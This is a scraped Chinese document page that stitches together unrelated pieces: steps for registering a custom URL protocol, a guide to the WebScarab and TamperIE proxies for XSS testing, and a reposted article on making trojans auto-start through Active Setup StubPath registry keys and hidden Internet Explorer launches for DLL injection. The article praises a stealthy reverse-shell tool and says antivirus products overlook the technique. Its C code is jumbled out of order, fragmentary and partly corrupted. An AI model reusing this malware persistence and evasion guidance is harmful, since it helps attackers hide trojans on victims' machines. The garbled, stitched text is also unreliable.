具体步骤如下:1、启动注册表:很简单,win+r—>regedit,打开注册表2、建立自己的协议:在HKEY_CLASSES_ROOT下建立一个自己的协议名称(右键新建项),如Camera,Camera下继续创建两个项,分别为DefaultIcon 和shell,最后在shell下建立command项,此时自己的协议结构就是这样的,下面开始设置对应的值。

3、首先是Camera项,建立URL Protocol项,并设定默认时的数据其次是DefaultIcon项,设定数据为要执行的exe文件的全路径最后是command项,设定数据为exe文件全路径+参数,这里%1就是传递给exe的参数,exe文件接收该参数并执行,如果web网页中的超链接代码为调用远程监控,那么%1这个参数就是“Camera://调用远程监控”字符串。

关于参数,Camera://后面的字符串被看作参数,有两种,一种是0,表示完整执行路径,另一种是1,表示网页传过来的字符串。

WebScarab和TamperIE的使用-汤进冉

WebScarab和TamperIE的使用-汤进冉

WebScarab和TamperIE的使用在测试XSS攻击(跨站攻击)防护时,我们常常通过修改报文相应的字段发起XSS 攻击进行测试。

本文档介绍了两种可以截取并修改报文的代理工具:WebScarab 和TamperIE一、WebScarab的使用WebScarab一款代理软件,包括HTTP代理,网络爬行、网络蜘蛛,会话ID 分析,自动脚本接口,模糊测试工具,WEB格式的编码/解码,WEB服务描述语言和SOAP解析器等功能模块。

WebScarab基于GNU协议,使用Java编写,是WebGoat中所使用的工具之一。

1.先安装java运行库:/technetwork/java/javase/downloads/index.html2.下载并安装WebScarab:/projects/owasp/files/WebScarab/20070504-1631/webscarab-installer-20070504-1631.jar为安装包webscarab-selfcontained-20070504-1631.jar则是lite版,lite版本不提供修改报文功能,因此我们要下载webscarab-installer-20070504-1631.jar下载后双击安装包,next默认安装即可3.设置代理在IE浏览器的Internet选项——连接——局域网设置——代理服务器,勾选为LAN使用代理服务器,地址填写localhost,端口为8008,其他都不勾选。

4.打开WebScarab,在Proxy标签下的Manual Edit中选择Method,并勾选Intercept request:这里选择了GET,那么我们只能对GET请求的HTTP进行修改5.打开浏览器访问URL地址,WebScarab会获取页面的请求,并跳出对话框:可以直接对其中的内容进行修改二、TamperIE的使用TamperIE是一个IE浏览器的小插件,可以修改cookie和post、get提交的表单数据等,用这个小工具可以很方便地修改,而不必抓包再提交。

相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
#if _MSC_VER >= 1000
#endif
#endif
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
DWORD WINAPI del(LPVOID lpParam)
{
RegDeleteKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}");
记得自己刚刚写DLL程序的时候,启动IE的方式使用下面的代码:
WinExec("C:\\Program Files\\Internet Explorer\\iexplore.exe -nohome",SW_HIDE);
也就是IE的空启动。用这种方法实现,虽然IE启动了,而且也挺隐蔽,但启动时就占用3000K的内存,这个是我们所不能接受的,我们希望程序启动能尽可能少的占用内存。后来在国外的一个站点上,我发现可以用下面的一种方法来启动,占用内存极小,其代码如下:
其实RECUB是一个Windows平台的远程管理工具,其源代码已经为我们写的很清楚了,下面简要介绍一下RECUB。它能对 Windows XP/2000/2003的反向连接Shell进行RC4加密;可以作为IE浏览器的实例启动并注入代码来绕过防火墙;通过加密的 ICMP请求来激活;没有监听端口;没有可见进程,以注入Explorer.exe的方式启动和退出;可以通过ActiveX启动;退出Shell的时候 没有事件日志;可以使用 nc得到远程Shell;EXE文件只有5.39K大小。怎么样,挺强的吧?下面我们就看一下它的部分代码,具体如下:
RegCloseKey (childkey);
从以上的代码我们可以清晰地看到,ActiveX启动其实非常简单,仅仅是在HKEY_LOCAL_MACHINE下的 Software\\ Microsoft\\Active Setup\\Installed Components\\中注册一条信息就可以了。这条 信息的键类似{36f8ec70-c29a-11d1-b5c7-0000f8051515}就可以。其实,我们可以随便的更改这些数字,只要不重复就可 以了,而且我们还可以在这个键的下面新增一些子键和值(我们服务端的绝对地址)。
在 上面的代码中有一个关键代码RegDeleteKey(HKEY_CURRENT_USER, ( LPCTSTR )regkey),其作用是每次启动 的时候清理HKEY_CURRENT_USER里面的信息。因为每当我们启动服务端的时候,系统都会自动在 HKEY_CURRENT_USER中注册一 些HKEY_LOCAL_MACHINE中的信息,我们必须在程序中删除这些,否则我们的服务端也只能有一次的自启动机会。
return TRUE;
}
下 面我们再来看看DLL注入IE的木马的启动IE的方式。网上的开源代码很多,不过80%的注入文件都是explorer.exe,这个虽说比较简单,但很 稳定。说它简单是因为它默认总是启动的,就不需要考虑它是否存在的问题。注入IE时,我们首先需要判断是否有iexplorer.exe的进程,如果没 有,我们就需要找到iexplorer.exe所在的目录(一般都在C:\Program Files\Internet Explorer中,不过还是 通过程序搜索最好,毕竟有好多网管把系统装在其他的盘符之中)。
// [email]xgymcn@[/email]
#ifdef NDEBUG
#pragma optimize("gsy",on)
#pragma comment(linker,"/RELEASE")
#ifdef _MERGE_RDATA_
//相关信息
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
//隐藏启动
si.wShowWindow = SW_HIDE;
//隐藏
pi.hProcess = SW_HIDE;
//启动的主函数
return 0;
}
这个最简单的程序就实现了在HKEY_LOCAL_MACHINE中注册ActiveX的过程。在程序退出的时候,我们可以编写下面的代码来清除HKEY_CURRENT_USER中的相关信息,以达到我们的程序启动的目的。
CreateThread(NULL,NULL,del,NULL,NULL,NULL); //ActiveX---
RegSetValue(hKey,NULL,REG_SZ,"系统设置",strlen("系统设置"));
RegSetValueEx(hKey,"stubpath",0,REG_EXPAND_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
RegCloseKey(hKey);
//把我们获取到的当前的路径复制给主键
RegSetValueEx (childkey, ( LPCTSTR )"StubPath" ,0, REG_SZ, ( const BYTE* ) ( LPCTSTR )pathexe,lstrlen(pathexe)) ;
//关闭HKEY的对象
编程实现木马的ActiveX启动和注入IE的启动方式[转载]2009-07-31 下午 02:10木 马的启动方式有很多种,现在比较流行的就是注册为系统服务启动(只适合Windows 2000以上的系统),或者以驱动的方式启动。不过,最近以 ActiveX方式启动又比较流行了,因为它适合Windows 9x或2000以上的机器,而且杀毒软件(比如瑞星、江民、金山等)基本不会去监视这种 启动方式,比较隐蔽。以ActiveX方式启动的木马国外的比较多,于是就到网上查找相关代码,发现了RECUB。
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
π
);
最 后我想说一下VC编译的优化处理问题。一是使用Release版而不用Debug版编译,因为使用Debug版编译会生成许多垃圾信息。使 用 Release版编译的具体方法是在“build(编译)->Configuration(配置)”中,将“Win32 debug”移去,然 后再次编译,就可以发现文件已经小了很多。二是设置自己的入口点函数。C或C++程序默认的入口函数是main()或WinMain (),但我们现在不 用Main和WinMain,因为这些都不是直接的入口点。编译器在产生exe文件的时候,将为我们生成真正的入口点。下面我们来定义自己的入口函数,具 体方法是把main或WinMain改成其它的名字(如MyFun),打开“Project(工程)->settings(设置)”选项,选中 “link”选项卡,在“Category(分类)”下拉列表中选“output”,在“Entry-Point symbol(输入项)”中输入我们刚 才定义的入口函数(MyFun),在源程序中也要做相应修改。三是优化最小大小;四是输出,入口点改为MyDll (随便改啦);五是连 接,/align:40。
CreateProcess(
NULL,
//我们暂时就简单的默认IE在C:\\Program Files\\Internet Explorer\\iexplore.exe中
"C:\\Program Files\\Internet Explorer\\iexplore.exe",
#pragma comment(linker,"/merge:.rdata=.data")
#endif
#pragma comment(linker,"/merge:.text=.data")
#pragma comment(linker,"/merge:.reloc=.data")
有了这些,基本上就能把我们的程序的体积减少很多,但每次这样的去设置,在编程的时候会很不方便,我们干脆直接写一个头文件(my.h),直接调用就少了很多的麻烦。下面是my.h的代码。
// Version 1.00
// xgym
// May 20th, 1999
根据上面的介绍,这里我就简单的写一段测试代码以供大家参考。启动VC,新建一个工程名称为test的Win32 Application,默认为一个 简单的Win32程序,并假定我们的服务端是在系统目录system32中的exloroe.exe。其代码如下:
#include "stdafx.h"
//获取我们运行的服务端的当前路径
GetModuleFileName(Nsprintf(regkey,"%s%s","Software\\Microsoft\\Active Setup\\Installed Components\\",REGKEY);
//进程information
PROCESS_INFORMATION pi = {0};
//启动信息
STARTUPINFO si = {0};
//存储信息
ZeroMemory(&si,sizeof(si));
//信息的大小
si.cb = sizeof(si);
相关文档
最新文档